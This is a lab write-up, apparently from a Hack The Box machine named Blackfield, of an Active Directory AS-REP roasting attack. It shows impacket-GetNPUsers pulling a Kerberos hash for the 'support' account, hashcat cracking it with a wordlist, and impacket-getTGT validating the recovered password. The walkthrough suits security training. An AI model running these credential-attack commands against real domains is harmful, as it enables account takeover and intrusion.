InfoSec LAB

Blackfield_ASREPRoasting

Created: 2 min read

ASREPRoasting

A total of 333 valid domain users have been enumerated via the [[Blackfield_RID_Cycling#[RID Cycling](https //www.trustedsec.com/blog/new-tool-release-rpc_enum-rid-cycling-attack/)|RID Cycling]] technique Additionally, the //dc01.blackfield.local/profiles$ share had so many directories that appear to be named after users. While these users have not been verified as valid domain users against the target Key Distribution Center (KDC), retaining them could be valuable for potential exploitation vectors in the future.

using the list of users from the [[blackfield_rid_cycling#[rid cycling](https //www.trustedsec.com/blog/new-tool-release-rpc_enum-rid-cycling-attack/)|rid cycling]] technique, i will attempt to see if any of those users have dont_req_preauth set

impacket-GetNPUsers

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ impacket-GetNPUsers blackfield.local/@dc01.blackfield.local -usersfile users.txt -request -dc-ip $IP  
Impacket v0.11.0 - Copyright 2023 Fortra
 
Password:
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
 
[...REDACTED...]
 
$krb5asrep$23$support@BLACKFIELD.LOCAL:66218f8855680578f98602b5455df6ba$fe10eca7fce8bcbd44db442ba0117190ca3c2792a6efbffde398aa35c02bd7d8c2a7b5eb65877f07f26aae188534c94f341d568ec54b0303d52fa27326332d6047d8b893b0d78746b19d2036955b7ee57eab75aa9b60582a9a6dd7fe8839c34f35af77da14cc13be3ae021014e0083ef8ce9a95703b87f38946b73e34daaa5a81eef393ef7f5525ab9c94e807a32ebbf4a20bcd34c5c7699e2d0e4c90f1bd34e4262925e2ea957ce588da25eeda4b7267351b052960c0da3a806ee9f49548e85d12395c7332d694f87c0f32222ce79eeb69bb93a6e25e7073d500853bca3bd2fe52d6611acec53b7488540100c44cb1ffaf2c145
 
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

The support user has the DONT_REQ_PREAUTH bit set. This particular account has been initially enumerated by kerbrute in the earlier stage. Additionally, KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) indicates that those users extracted from the //dc01.blackfield.local/profiles$ share are not domain users

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ hashcat --show support.hash
 
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
 
┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ hashcat -a 0 -m 18200 support.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344386
* bytes.....: 139921519
* keyspace..: 14344386
 
$krb5asrep$23$support@blackfield.local:66218f8855680578f98602b5455df6ba$fe10eca7fce8bcbd44db442ba0117190ca3c2792a6efbffde398aa35c02bd7d8c2a7b5eb65877f07f26aae188534c94f341d568ec54b0303d52fa27326332d6047d8b893b0d78746b19d2036955b7ee57eab75aa9b60582a9a6dd7fe8839c34f35af77da14cc13be3ae021014e0083ef8ce9a95703b87f38946b73e34daaa5a81eef393ef7f5525ab9c94e807a32ebbf4a20bcd34c5c7699e2d0e4c90f1bd34e4262925e2ea957ce588da25eeda4b7267351b052960c0da3a806ee9f49548e85d12395c7332d694f87c0f32222ce79eeb69bb93a6e25e7073d500853bca3bd2fe52d6611acec53b7488540100c44cb1ffaf2c145:#00^BlackKnight
 
session..........: hashcat
status...........: Cracked
hash.mode........: 18200 (Kerberos 5, etype 23, AS-REP)
hash.target......: $krb5asrep$23$support@BLACKFIELD.LOCAL:66218f885568...f2c145
time.started.....: Thu Dec 21 00:52:19 2023 (8 secs)
time.estimated...: Thu Dec 21 00:52:27 2023 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........:  1925.7 kH/s (0.92ms) @ Accel:512 Loops:1 Thr:1 Vec:8
recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
progress.........: 14337024/14344386 (99.95%)
rejected.........: 0/14337024 (0.00%)
restore.point....: 14333952/14344386 (99.93%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#1....: #1crappers -> "$)(*(dolphins
hardware.mon.#1..: Util: 63%
 
started: Thu Dec 21 00:52:18 2023
stopped: Thu Dec 21 00:52:28 2023

hashcat cracked the password hash for the support user The cracked password is #00^BlackKnight

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ impacket-getTGT BLACKFIELD.LOCAL/support@dc01.blackfield.local -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
Password: #00^BlackKnight
[*] Saving ticket in support@dc01.blackfield.local.ccache

Credential validated for the support user TGT saved; support@dc01.blackfield.local.ccache

Interactive Graph View

Backlinks